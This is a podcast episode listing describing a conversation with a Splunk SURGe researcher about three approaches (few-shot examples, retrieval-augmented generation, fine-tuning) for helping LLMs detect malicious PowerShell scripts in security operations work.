Teaching LLMs to spot malicious PowerShell scripts Podcast Por  arte de portada

Teaching LLMs to spot malicious PowerShell scripts

Teaching LLMs to spot malicious PowerShell scripts

Escúchala gratis

Ver detalles del espectáculo

Hazel welcomes back Ryan Fetterman from the SURGe team to explore his new research on how large language models (LLMs) can assist those who work in security operations centers to identify malicious PowerShell scripts. From teaching LLMs through examples, to using retrieval-augmented generation and fine-tuning specialized models, Ryan walks us through three distinct approaches, with surprising performance gains. For the full research, head to https://www.splunk.com/en_us/blog/security/guiding-llms-with-security-context.html

Todavía no hay opiniones